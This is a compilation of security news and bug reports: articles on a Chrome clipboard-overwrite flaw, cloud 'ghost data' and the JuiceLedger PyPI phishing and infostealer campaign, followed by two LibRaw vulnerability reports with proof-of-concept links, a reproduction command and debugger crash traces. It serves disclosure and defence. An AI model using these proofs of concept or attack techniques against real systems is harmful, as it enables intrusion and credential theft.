A "major" security issue in the Google Chrome web browser, as well as Chromium-based alternatives, could allow malicious web pages to automatically overwrite clipboard content without requiring any user consent or interaction by simply visiting them.
The clipboard poisoning attack is said to have been accidentally introduced in Chrome version 104, according to developer Jeff Johnson.
While the

A "major" security issue in the Google Chrome web browser, as well as Chromium-based alternatives, could allow malicious web pages to automatically overwrite clipboard content without requiring any user consent or interaction by simply visiting them.

The clipboard poisoning attack is said to have been accidentally introduced in Chrome version 104, according to developer Jeff Johnson.

While the problem exists in Apple Safari and Mozilla Firefox as well, what makes the issue severe in Chrome is that the requirement for a user gesture to copy content to the clipboard is currently broken.

User gestures include selecting a piece of text and pressing Control+C (or ⌘-C for macOS) or selecting "Copy" from the context menu.

"Therefore, a gesture as innocent as clicking on a link or pressing the arrow key to scroll down the page gives the website permission to overwrite your system clipboard," Johnson noted.

The ability to substitute clipboard data poses security implications. In a hypothetical attack scenario, an adversary could lure a victim to visit a rogue landing page and rewrite the address of a cryptocurrency wallet previously copied by the target with one under their control, resulting in unauthorized fund transfers.

Alternatively, threat actors could overwrite the clipboard with a link to specially crafted websites, leading victims to download dangerous software.

"While you're navigating a web page, the page can without your knowledge erase the current contents of your system clipboard, which may have been valuable to you, and replace them with anything the page wants, which could be dangerous to you the next time you paste," Johnson explained.

Google is already aware of the issue and a patch is expected to be released soon, given the seriousness of the flaw and the likelihood of abuse by malicious actors.

In the interim, users are advised to refrain from opening web pages between any cut/copy and paste actions and verify their clipboard before carrying out sensitive operations on the web, such as financial transactions.

The development comes as Google released a new version of Chrome (105.0.5195.52/53/54) for Windows, macOS, and Linux with fixes for 24 shortcomings, 10 of which relate to use-after-free bugs in Network Service, WebSQL, WebSQL, PhoneHub, among others.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Chrome Bug Lets Sites Silently Overwrite System Clipboard Content

IT has to get its hands around cloud data sprawl. Another area of focus should be on ghost data, as it expands the organization's cloud attack surface.

Cloud sprawl is a big issue for organizations, with business teams to spinning up cloud systems and services on their own, often without IT oversight. That leads to cloud data sprawl as data is scattered across different environments. If IT doesn’t know about the cloud systems and services, then IT is also not managing the data being collected, processed, and stored there.

We all know about shadow IT, the systems and network devices in the organization’s environment that IT is not managing. Similarly, shadow data refers to unmanaged data store copies and snapshots or log data not part of IT’s backup and recovery strategy. Researchers at Cyera estimate that 60% of the data security posture issues present in cloud accounts stem from unsecured sensitive data.

Then there is the problem of ghost data.

When data gets deleted from cloud systems, it isn’t fully gone. Copies linger in backups or snapshots of data stores. Ghost data refers to those copies left behind after the original has been deleted, and Cyera’s recent analysis show that enterprises have quite a lot of it.

After scanning the three major cloud providers (Amazon Web Services, Azure, and Google Cloud), Cyera researchers found that over 30% of scanned customer cloud data stores are ghost data and more than 58% contain sensitive, or very sensitive, data. For example, researchers found unsecured database snapshots in non-production environments that contained sensitive customer data where the original database had been destroyed. Researchers also uncovered sensitive personal and authentication data in plain text where the production data and application were no longer in use.

Ghost data usually has no business value – the data was deleted for a reason -- and having it around unnecessarily increases business risk. Attackers don’t care if they get their hands on the original sensitive information or the copy because to them, all data has value, regardless of the form it takes. Organizations still are on the hook if the attackers get their hands on ghost data. The data security provisions of industry-specific regulations like HIPAA, PCI DSS, and the Sarbanes-Oxley Act still apply.

Organizations need to reduce cloud data exposure to reduce data sprawl. Proper data hygiene across clouds will also help clean up data when it is no longer in use.

On a final note, ghost data can increase the organization’s cloud costs: Researchers found over $50,000 in excess data store snapshots being retained in a cloud environment.

Ghost Data Increases Enterprise Business Risk

"JuiceLedger" has escalated a campaign to distribute its information stealer by now going after developers who published code on the widely used Python code repository.

Security researchers have identified a previously unknown group dubbed "JuiceLedger" as the threat actor behind a recent and first-known phishing campaign specifically targeting users of the Python Package Index (PyPI).

The threat actor first surfaced early this year and is focused on distributing a .NET-based malware called JuiceStealer for searching and stealing browser and cryptocurrency-related information from infected systems.

Initially, JuiceLedger distributed the information stealer via fraudulent Python installer applications. But starting in August, researchers from SentinelOne and Checkmarx observed the attacker also engaged in attempts to poison Python packages on the PyPI repository — presumably to distribute its malware to a wider audience.

The threat actor's modus operandi has involved targeting PyPI users with a phishing email informing them about Google implementing a new validation process for packages published on PyPI. The email claimed the measure was in response to a big increase in malicious PyPI packages getting uploaded to the registry. It warned developers to expeditiously validate their code packages with Google to avoid having them removed from the registry. "Packages not validated before September will be removed promptly," the phishing email noted.

PyPI users who clicked on the link were directed to a webpage, spoofed to look exactly like PyPI's login page. When users entered their credentials there, the page was designed to send that information to a JuiceLedger-controlled domain (linkedopports\[dot\]com). The caper appears to have convinced at least two developers to part with their credentials, which gave JuiceLedger a way to access and poison their relatively widely used PyPI packages with malicious code.

One of the infected packages (version 0.1.6 of "exotel"), for instance, had more than 480,000 total downloads at the time it was infected. The other package (versions 2.0.2 and 4.0.2 of "spam") had some 200,000 downloads. PyPI administrators have since removed both packages, according to Checkmarx.

When installed in a development environment, the code can search for Google Chrome passwords, query Chrome SQLite files, and launch a Python installer contained in the zip named “config.exe," SentinelOne said. The infostealer also looks for logs that contain the word "vault," likely because it is searching for cryptocurrency vaults, and reports the information back to an attacker-controlled command-and-control server over HTTP.

**Broad Campaign**

PyPI admins have also removed "several hundred" typosquatted packages that JuiceLedger published to PyPI as part of a broader effort to distribute its infostealer via the popular Python code repository, both SentinelOne and Checkmarx noted. Their analysis showed the threat actors had inserted a short code snippet in the packages for retrieving a signed variant of JuiceStealer from an attacker-controller URL and executing it.

The code in the typosquatted packages was similar to the code that JuiceLedger had inserted into the two legitimate code packages via its phishing campaign. The attacker-controlled URL that the typosquatted packages communicated with was also the same as the same the one that the poisoned versions of "exotel" and "spam" packages communicated. This allowed researchers at SentinelOne and Checkmarx to conclude JuiceLedger was responsible for both, the PyPI phishing campaign and for uploading the typosquatted packages to PyPI.

JuiceLedger's attack on PyPI in August represents a dangerous escalation in the threat actor's efforts to distribute its information stealer, SentinelOne said. "In August 2022, the threat actor engaged in poisoning open-source packages as a way to target a wider audience with the infostealer through a supply chain attack, raising the threat level posed by this group considerably."

**Popular — but Not the Only — Target**

PyPI recently has become a popular target for attackers trying to poison software supply chains. Countless organizations use the code published in the repository to build their applications. So, by poisoning packages on the registry, attackers can potentially reach a wide audience with relatively little effort. Recent examples include threat actors inserting malicious package installation code in 10 packages published to PyPI, another incident where some 300 developers inadvertently downloaded a package for installing Cobalt Strike from the registry and one where a school-age hacker uploaded ransomware to the registry to see what would transpire.

PyPI is by far not the only code repository that attackers have targeted recently. Security vendors have reported numerous similar incidents involving other widely used registries such as npm and Maven Central. The trend has heightened attention on software supply chain security issues, especially because of the potential for nation-state backed adversaries — like the Russian threat actor behind the SolarWinds compromise — exploiting the same tactic in their attack campaigns.

Attackers are taking advantage of the fact that developers and organizations will always need to use open source packages, says Amitai Ben, threat intelligence researcher at SentinelOne.

The best way to minimize exposure for those contributing open source code to public repositories is to enable two-factor authentication (2FA) on their user account in package managers. That minimizes the risk of account takeover by malicious actors.

Users of open source packages, meanwhile, need to know that popular packages are often connected to Git repositories from which the development process is taking place. "Discrepancies between the repository and the package on the package manager can be a sign of suspicious activity and account takeover," Ben says.

Threat Actor Phishing PyPI Users Identified

In LibRaw, there is a memory corruption vulnerability within the "crxFreeSubbandData()" function (libraw\src\decoders\crx.cpp) when processing cr3 files.

**Description:**

There is a memory corruption vulnerability within the "crxFreeSubbandData()" function (libraw\\src\\decoders\\crx.cpp) when processing cr3 files.

**Steps to Reproduce:**

poc (password: 0xfoxone):  
https://drive.google.com/open?id=10pjqVx6mItzmvovgqF-8IHi3jnnKQ6fD

cmd:  
magick.exe convert poc.cr3 new.bmp

Upon running this, following crash happens (Note: I enabled page heap on magick.exe):

Microsoft (R) Windows Debugger Version 10.0.18362.1 X86  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\magick.exe convert c:\\poc.cr3 c:\\new.bmp

Symbol search path is: srv\*  
Executable search path is:  
ModLoad: 00e90000 00ea0000 magick.exe  
ModLoad: 776c0000 7785a000 ntdll.dll  
Page heap: pid 0x125C: page heap enabled with flags 0x3.  
ModLoad: 6c050000 6c0b3000 C:\\WINDOWS\\SysWOW64\\verifier.dll  
Page heap: pid 0x125C: page heap enabled with flags 0x3.  
ModLoad: 75260000 75340000 C:\\WINDOWS\\SysWOW64\\KERNEL32.DLL  
ModLoad: 76570000 7676e000 C:\\WINDOWS\\SysWOW64\\KERNELBASE.dll  
ModLoad: 6bdf0000 6c049000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_MagickCore\_.dll  
ModLoad: 75530000 756c7000 C:\\WINDOWS\\SysWOW64\\USER32.dll  
ModLoad: 756d0000 756e7000 C:\\WINDOWS\\SysWOW64\\win32u.dll  
ModLoad: 76470000 76491000 C:\\WINDOWS\\SysWOW64\\GDI32.dll  
ModLoad: 75340000 7549a000 C:\\WINDOWS\\SysWOW64\\gdi32full.dll  
ModLoad: 75dd0000 75e4c000 C:\\WINDOWS\\SysWOW64\\msvcp\_win.dll  
ModLoad: 76ab0000 76bcf000 C:\\WINDOWS\\SysWOW64\\ucrtbase.dll  
ModLoad: 754b0000 75529000 C:\\WINDOWS\\SysWOW64\\ADVAPI32.dll  
ModLoad: 775f0000 776af000 C:\\WINDOWS\\SysWOW64\\msvcrt.dll  
ModLoad: 76a30000 76aa6000 C:\\WINDOWS\\SysWOW64\\sechost.dll  
ModLoad: 75720000 757db000 C:\\WINDOWS\\SysWOW64\\RPCRT4.dll  
ModLoad: 74e90000 74eb0000 C:\\WINDOWS\\SysWOW64\\SspiCli.dll  
ModLoad: 74e80000 74e8a000 C:\\WINDOWS\\SysWOW64\\CRYPTBASE.dll  
ModLoad: 750f0000 7514f000 C:\\WINDOWS\\SysWOW64\\bcryptPrimitives.dll  
ModLoad: 76510000 7656e000 C:\\WINDOWS\\SysWOW64\\WS2\_32.dll  
ModLoad: 6bc80000 6bde2000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_MagickWand\_.dll  
ModLoad: 6bc60000 6bc7c000 C:\\WINDOWS\\SysWOW64\\VCRUNTIME140D.dll  
ModLoad: 6bae0000 6bc53000 C:\\WINDOWS\\SysWOW64\\ucrtbased.dll  
ModLoad: 6bac0000 6bade000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_bzlib\_.dll  
ModLoad: 6b9f0000 6bac0000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_freetype\_.dll  
ModLoad: 6b980000 6b9e6000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_lcms\_.dll  
ModLoad: 6b900000 6b97c000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_libxml\_.dll  
ModLoad: 6b8e0000 6b8fa000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_lqr\_.dll  
ModLoad: 6b8b0000 6b8d1000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_zlib\_.dll  
ModLoad: 6b880000 6b8a8000 C:\\WINDOWS\\SysWOW64\\VCOMP140D.DLL  
ModLoad: 6b5f0000 6b87e000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_glib\_.dll  
ModLoad: 76cd0000 77246000 C:\\WINDOWS\\SysWOW64\\SHELL32.dll  
ModLoad: 769f0000 76a2b000 C:\\WINDOWS\\SysWOW64\\cfgmgr32.dll  
ModLoad: 75d40000 75dc4000 C:\\WINDOWS\\SysWOW64\\shcore.dll  
ModLoad: 77370000 775e5000 C:\\WINDOWS\\SysWOW64\\combase.dll  
ModLoad: 75ea0000 76464000 C:\\WINDOWS\\SysWOW64\\windows.storage.dll  
ModLoad: 75d20000 75d3b000 C:\\WINDOWS\\SysWOW64\\profapi.dll  
ModLoad: 75cd0000 75d13000 C:\\WINDOWS\\SysWOW64\\powrprof.dll  
ModLoad: 76770000 7677d000 C:\\WINDOWS\\SysWOW64\\UMPDC.dll  
ModLoad: 764c0000 76504000 C:\\WINDOWS\\SysWOW64\\shlwapi.dll  
ModLoad: 756f0000 756ff000 C:\\WINDOWS\\SysWOW64\\kernel.appcore.dll  
ModLoad: 76780000 76793000 C:\\WINDOWS\\SysWOW64\\cryptsp.dll  
ModLoad: 76bd0000 76cc7000 C:\\WINDOWS\\SysWOW64\\ole32.dll  
ModLoad: 747c0000 747f2000 C:\\WINDOWS\\SysWOW64\\IPHLPAPI.DLL  
ModLoad: 74720000 747b3000 C:\\WINDOWS\\SysWOW64\\DNSAPI.dll  
ModLoad: 75700000 75707000 C:\\WINDOWS\\SysWOW64\\NSI.dll  
(125c.fa8): Break instruction exception - code 80000003 (first chance)  
eax=00000000 ebx=011be000 ecx=366a0000 edx=00000000 esi=04b1a7c8 edi=776c688c  
eip=7776eaa2 esp=00f9f7d0 ebp=00f9f7fc iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246  
ntdll!LdrInitShimEngineDynamic+0x6e2:  
7776eaa2 cc int 3  
0:000> g  
ModLoad: 77340000 77365000 C:\\WINDOWS\\SysWOW64\\IMM32.DLL  
ModLoad: 6b390000 6b39e000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\IM\_MOD\_DB\_DNG\_.dll  
ModLoad: 6b230000 6b384000 C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_libraw\_.dll  
ModLoad: 6b170000 6b229000 C:\\WINDOWS\\SysWOW64\\MSVCP140D.dll  
ModLoad: 73db0000 73ddf000 C:\\WINDOWS\\SysWOW64\\rsaenh.dll  
ModLoad: 764a0000 764b9000 C:\\WINDOWS\\SysWOW64\\bcrypt.dll  
(125c.fa8): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
\*\*\* WARNING: Unable to verify checksum for C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_libraw\_.dll  
eax=cdcdcdcd ebx=00000000 ecx=cdcdcdcd edx=0a2465b8 esi=00f9414c edi=00f941a4  
eip=6b2e0e5f esp=00f94114 ebp=00f9411c iopl=0 nv up ei ng nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010282  
CORE\_DB\_libraw\_!crxFreeSubbandData+0xf:  
6b2e0e5f 833800 cmp dword ptr \[eax\],0 ds:002b:cdcdcdcd=????????  
0:000> k  
ChildEBP RetAddr  
00 00f9411c 6b2e0de7 CORE\_DB\_libraw\_!crxFreeSubbandData+0xf \[c:\\imagemagick-7.0.10-7-x86\\libraw\\src\\decoders\\crx.cpp @ 1633\]  
01 00f94140 6b2e3100 CORE\_DB\_libraw\_!crxFreeImageData+0xa7 \[c:\\imagemagick-7.0.10-7-x86\\libraw\\src\\decoders\\crx.cpp @ 2341\]  
02 00f941f8 6b2f86f5 CORE\_DB\_libraw\_!LibRaw::crxLoadRaw+0x210 \[c:\\imagemagick-7.0.10-7-x86\\libraw\\src\\decoders\\crx.cpp @ 2440\]  
03 00f94374 6b300abc CORE\_DB\_libraw\_!LibRaw::unpack+0xa25 \[c:\\imagemagick-7.0.10-7-x86\\libraw\\src\\decoders\\unpack.cpp @ 282\]  
\*\*\* WARNING: Unable to verify checksum for C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\IM\_MOD\_DB\_DNG\_.dll  
04 00f94380 6b391be6 CORE\_DB\_libraw\_!libraw\_unpack+0x2c \[c:\\imagemagick-7.0.10-7-x86\\libraw\\src\\libraw\_c\_api.cpp @ 136\]  
\*\*\* WARNING: Unable to verify checksum for C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_MagickCore\_.dll  
05 00f963d8 6be552e3 IM\_MOD\_DB\_DNG\_!ReadDNGImage+0x466 \[c:\\imagemagick-7.0.10-7-x86\\imagemagick\\coders\\dng.c @ 408\]  
06 00f9b4f0 6be568ac CORE\_DB\_MagickCore\_!ReadImage+0x543 \[c:\\imagemagick-7.0.10-7-x86\\imagemagick\\magickcore\\constitute.c @ 553\]  
\*\*\* WARNING: Unable to verify checksum for C:\\ImageMagick-7.0.10-7-x86\\VisualMagick\\bin\\CORE\_DB\_MagickWand\_.dll  
07 00f9c534 6bcad449 CORE\_DB\_MagickCore\_!ReadImages+0x2fc \[c:\\imagemagick-7.0.10-7-x86\\imagemagick\\magickcore\\constitute.c @ 941\]  
08 00f9da94 6bd1912d CORE\_DB\_MagickWand\_!ConvertImageCommand+0xd29 \[c:\\imagemagick-7.0.10-7-x86\\imagemagick\\magickwand\\convert.c @ 606\]  
\*\*\* WARNING: Unable to verify checksum for magick.exe  
09 00f9eb50 00e913de CORE\_DB\_MagickWand\_!MagickCommandGenesis+0x2cd \[c:\\imagemagick-7.0.10-7-x86\\imagemagick\\magickwand\\mogrify.c @ 186\]  
0a 00f9fc84 00e91626 magick!MagickMain+0x3de \[c:\\imagemagick-7.0.10-7-x86\\imagemagick\\utilities\\magick.c @ 149\]  
0b 00f9fca4 00e91d2e magick!wmain+0x46 \[c:\\imagemagick-7.0.10-7-x86\\imagemagick\\utilities\\magick.c @ 195\]  
0c 00f9fcb8 00e91c10 magick!invoke\_main+0x1e \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 79\]  
0d 00f9fd10 00e91abd magick!\_\_scrt\_common\_main\_seh+0x150 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 253\]  
0e 00f9fd18 00e91d48 magick!\_\_scrt\_common\_main+0xd \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 296\]  
0f 00f9fd20 75276359 magick!wmainCRTStartup+0x8 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_wmain.cpp @ 17\]  
WARNING: Stack unwind information not available. Following frames may be wrong.  
10 00f9fd30 77727c24 KERNEL32!BaseThreadInitThunk+0x19  
11 00f9fd8c 77727bf4 ntdll!RtlGetAppContainerNamedObjectPath+0xe4  
12 00f9fd9c 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4

**System Configuration:**

*   ImageMagick:  
    Version: ImageMagick-7.0.10-Q16 https://imagemagick.org  
    License: https://imagemagick.org/script/license.php
*   Environment (Operating system, version and so on):  
    Distributor ID: Microsoft Windows  
    Description: Windows 10

CVE-2020-35534: Libraw "crxFreeSubbandData()" Memory Corruption Vulnerability · Issue #279 · LibRaw/LibRaw

In LibRaw, there is an out-of-bounds read vulnerability within the "LibRaw::parseSonySRF()" function (libraw\src\metadata\sony.cpp) when processing srf files.

**Description:**

There is an out-of-bounds read vulnerability within the "LibRaw::parseSonySRF()" function (libraw\\src\\metadata\\sony.cpp) when processing srf files.

**Steps to Reproduce:**

poc (password: 0xfoxone):  
https://drive.google.com/open?id=1r0wig5pSGUFhP3mDycIUcKMvnHamYaGJ

cmd:  
magick.exe convert poc.srf new.bmp

Upon running this, following crash happens (Note: I enabled page heap on magick.exe):

Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\magick.exe convert c:\\poc.srf c:\\new.bmp  
Symbol search path is: srv\*  
Executable search path is:  
ModLoad: 00007ff779300000 00007ff779312000 magick.exe  
ModLoad: 00007ffdb0d20000 00007ffdb0f10000 ntdll.dll  
ModLoad: 00007ffd99d60000 00007ffd99dd1000 C:\\WINDOWS\\System32\\verifier.dll  
Page heap: pid 0x1ED0: page heap enabled with flags 0x3.  
ModLoad: 00007ffdaf870000 00007ffdaf922000 C:\\WINDOWS\\System32\\KERNEL32.DLL  
ModLoad: 00007ffdadd60000 00007ffdae004000 C:\\WINDOWS\\System32\\KERNELBASE.dll  
ModLoad: 00007ffd87cf0000 00007ffd87fe1000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_MagickCore\_.dll  
ModLoad: 00007ffd886a0000 00007ffd8886b000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_MagickWand\_.dll  
ModLoad: 00007ffdb01a0000 00007ffdb0334000 C:\\WINDOWS\\System32\\USER32.dll  
ModLoad: 00007ffdaea40000 00007ffdaea61000 C:\\WINDOWS\\System32\\win32u.dll  
ModLoad: 00007ffdaf270000 00007ffdaf296000 C:\\WINDOWS\\System32\\GDI32.dll  
ModLoad: 00007ffdae010000 00007ffdae1a4000 C:\\WINDOWS\\System32\\gdi32full.dll  
ModLoad: 00007ffdaea70000 00007ffdaeb0e000 C:\\WINDOWS\\System32\\msvcp\_win.dll  
ModLoad: 00007ffdaeb30000 00007ffdaec2a000 C:\\WINDOWS\\System32\\ucrtbase.dll  
ModLoad: 00007ffdb04c0000 00007ffdb0563000 C:\\WINDOWS\\System32\\ADVAPI32.dll  
ModLoad: 00007ffdafdf0000 00007ffdafe8e000 C:\\WINDOWS\\System32\\msvcrt.dll  
ModLoad: 00007ffdb0420000 00007ffdb04b7000 C:\\WINDOWS\\System32\\sechost.dll  
ModLoad: 00007ffdaf5b0000 00007ffdaf6d0000 C:\\WINDOWS\\System32\\RPCRT4.dll  
ModLoad: 00007ffdafd80000 00007ffdafdef000 C:\\WINDOWS\\System32\\WS2\_32.dll  
ModLoad: 00007ffda1d20000 00007ffda1d42000 C:\\WINDOWS\\SYSTEM32\\VCRUNTIME140D.dll  
ModLoad: 00007ffd86800000 00007ffd869bb000 C:\\WINDOWS\\SYSTEM32\\ucrtbased.dll  
ModLoad: 00007ffd8d900000 00007ffd8da1f000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_freetype\_.dll  
ModLoad: 00007ffd8e600000 00007ffd8e686000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_lcms\_.dll  
ModLoad: 00007ffda1b50000 00007ffda1b77000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_bzlib\_.dll  
ModLoad: 00007ffd8e1c0000 00007ffd8e260000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_libxml\_.dll  
ModLoad: 00007ffd9dbe0000 00007ffd9dc03000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_lqr\_.dll  
ModLoad: 00007ffd9d610000 00007ffd9d63a000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_zlib\_.dll  
ModLoad: 00007ffd9a400000 00007ffd9a435000 C:\\WINDOWS\\SYSTEM32\\VCOMP140D.DLL  
ModLoad: 00007ffd85150000 00007ffd8548b000 C:\\ImageMagick-7.0.10-7\\VisualMagick\\bin\\CORE\_DB\_glib\_.dll  
ModLoad: 00007ffdb05f0000 00007ffdb0cd4000 C:\\WINDOWS\\System32\\SHELL32.dll  
ModLoad: 00007ffdaed80000 00007ffdaedca000 C:\\WINDOWS\\System32\\cfgmgr32.dll  
ModLoad: 00007ffdafc70000 00007ffdafd19000 C:\\WINDOWS\\System32\\shcore.dll  
ModLoad: 00007ffdaf930000 00007ffdafc66000 C:\\WINDOWS\\System32\\combase.dll  
ModLoad: 00007ffdae1b0000 00007ffdae230000 C:\\WINDOWS\\System32\\bcryptPrimitives.dll  
ModLoad: 00007ffdae260000 00007ffdae9dd000 C:\\WINDOWS\\System32\\windows.storage.dll  
ModLoad: 00007ffdadc80000 00007ffdadca3000 C:\\WINDOWS\\System32\\profapi.dll  
ModLoad: 00007ffdadbf0000 00007ffdadc3a000 C:\\WINDOWS\\System32\\powrprof.dll  
ModLoad: 00007ffdadbe0000 00007ffdadbf0000 C:\\WINDOWS\\System32\\UMPDC.dll  
ModLoad: 00007ffdb03c0000 00007ffdb0412000 C:\\WINDOWS\\System32\\shlwapi.dll  
ModLoad: 00007ffdadc40000 00007ffdadc51000 C:\\WINDOWS\\System32\\kernel.appcore.dll  
ModLoad: 00007ffdaeb10000 00007ffdaeb27000 C:\\WINDOWS\\System32\\cryptsp.dll  
ModLoad: 00007ffdb0040000 00007ffdb0197000 C:\\WINDOWS\\System32\\ole32.dll  
ModLoad: 00007ffdad1b0000 00007ffdad27b000 C:\\WINDOWS\\SYSTEM32\\DNSAPI.dll  
ModLoad: 00007ffdaf370000 00007ffdaf378000 C:\\WINDOWS\\System32\\NSI.dll  
ModLoad: 00007ffdad160000 00007ffdad19a000 C:\\WINDOWS\\SYSTEM32\\IPHLPAPI.DLL  
(1ed0.1214): Break instruction exception - code 80000003 (first chance)  
ntdll!LdrpDoDebuggerBreak+0x30:  
00007ffdb0df119c cc              int     3 0:000> g ModLoad: 00007ffdaf4b0000 00007ffdaf4de000   C:\WINDOWS\System32\IMM32.DLL ModLoad: 00007ffda93a0000 00007ffda93af000   C:\ImageMagick-7.0.10-7\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 00007ffd86310000 00007ffd864bc000   C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 00007ffd88e10000 00007ffd88f06000   C:\WINDOWS\SYSTEM32\MSVCP140D.dll (1ed0.1214): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libraw_.dll CORE_DB_libraw_!LibRaw::sget2+0x2c: 00007ffd86396d9c 0fb60401 movzx eax,byte ptr \[rcx+rax\] ds:0000019e5bb50000=?? 0:000> k Child-SP          RetAddr           Call Site 00 000000939ecee890 00007ffd8636bf5d CORE_DB_libraw_!LibRaw::sget2+0x2c [c:\imagemagick-7.0.10-7\libraw\src\utils\utils_dcraw.cpp @ 84]  01 000000939ecee8a0 00007ffd8636fe7a CORE_DB_libraw_!LibRaw::parseSonySRF+0x42d [c:\imagemagick-7.0.10-7\libraw\src\metadata\sony.cpp @ 1952]  02 000000939ecee950 00007ffd8638071a CORE_DB_libraw_!LibRaw::parse_exif+0x155a [c:\imagemagick-7.0.10-7\libraw\src\metadata\exif_gps.cpp @ 229]  03 000000939eceef50 00007ffd8637bebb CORE_DB_libraw_!LibRaw::parse_tiff_ifd+0x484a [c:\imagemagick-7.0.10-7\libraw\src\metadata\tiff.cpp @ 717]  04 000000939ecefdd0 00007ffd8632f89f CORE_DB_libraw_!LibRaw::parse_tiff+0x11b [c:\imagemagick-7.0.10-7\libraw\src\metadata\tiff.cpp @ 1468]  05 000000939ecefe30 00007ffd864079de CORE_DB_libraw_!LibRaw::identify+0xd2f [c:\imagemagick-7.0.10-7\libraw\src\metadata\identify.cpp @ 537]  06 000000939ecf3350 00007ffd8640b149 CORE_DB_libraw_!LibRaw::open_datastream+0x10e [c:\imagemagick-7.0.10-7\libraw\src\utils\open.cpp @ 377]  07 000000939ecf35f0 00007ffd8641dfc8 CORE_DB_libraw_!LibRaw::open_file+0x269 [c:\imagemagick-7.0.10-7\libraw\src\utils\open.cpp @ 99]  *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\IM_MOD_DB_DNG_.dll 08 000000939ecf3720 00007ffda93a191c CORE_DB_libraw_!libraw_open_wfile+0x58 [c:\imagemagick-7.0.10-7\libraw\src\libraw_c_api.cpp @ 113]  *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickCore_.dll 09 000000939ecf3760 00007ffd87d671e7 IM_MOD_DB_DNG_!ReadDNGImage+0x2fc [c:\imagemagick-7.0.10-7\imagemagick\coders\dng.c @ 379]  0a 000000939ecf5870 00007ffd87d68963 CORE_DB_MagickCore_!ReadImage+0x5e7 [c:\imagemagick-7.0.10-7\imagemagick\magickcore\constitute.c @ 553]  *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickWand_.dll 0b 000000939ecfaa90 00007ffd886daac3 CORE_DB_MagickCore_!ReadImages+0x393 [c:\imagemagick-7.0.10-7\imagemagick\magickcore\constitute.c @ 941]  0c 000000939ecfbb40 00007ffd887744ae CORE_DB_MagickWand_!ConvertImageCommand+0x1523 [c:\imagemagick-7.0.10-7\imagemagick\magickwand\convert.c @ 606]  *** WARNING: Unable to verify checksum for magick.exe 0d 000000939ecfd690 00007ff7793014ea CORE_DB_MagickWand_!MagickCommandGenesis+0x33e [c:\imagemagick-7.0.10-7\imagemagick\magickwand\mogrify.c @ 186]  0e 000000939ecfe800 00007ff779301693 magick!MagickMain+0x4ea [c:\imagemagick-7.0.10-7\imagemagick\utilities\magick.c @ 149]  0f 000000939ecffa70 00007ff779301f24 magick!wmain+0x43 [c:\imagemagick-7.0.10-7\imagemagick\utilities\magick.c @ 195]  10 000000939ecffab0 00007ff779301e37 magick!invoke_main+0x34 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 80]  11 000000939ecffaf0 00007ff779301cfe magick!__scrt_common_main_seh+0x127 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253]  12 000000939ecffb50 00007ff779301f39 magick!__scrt_common_main+0xe [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296]  13 000000939ecffb80 00007ffdaf887bd4 magick!wmainCRTStartup+0x9 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17]  14 000000939ecffbb0 00007ffdb0d8ce51 KERNEL32!BaseThreadInitThunk+0x14 15 000000939ecffbe0 00000000\`00000000 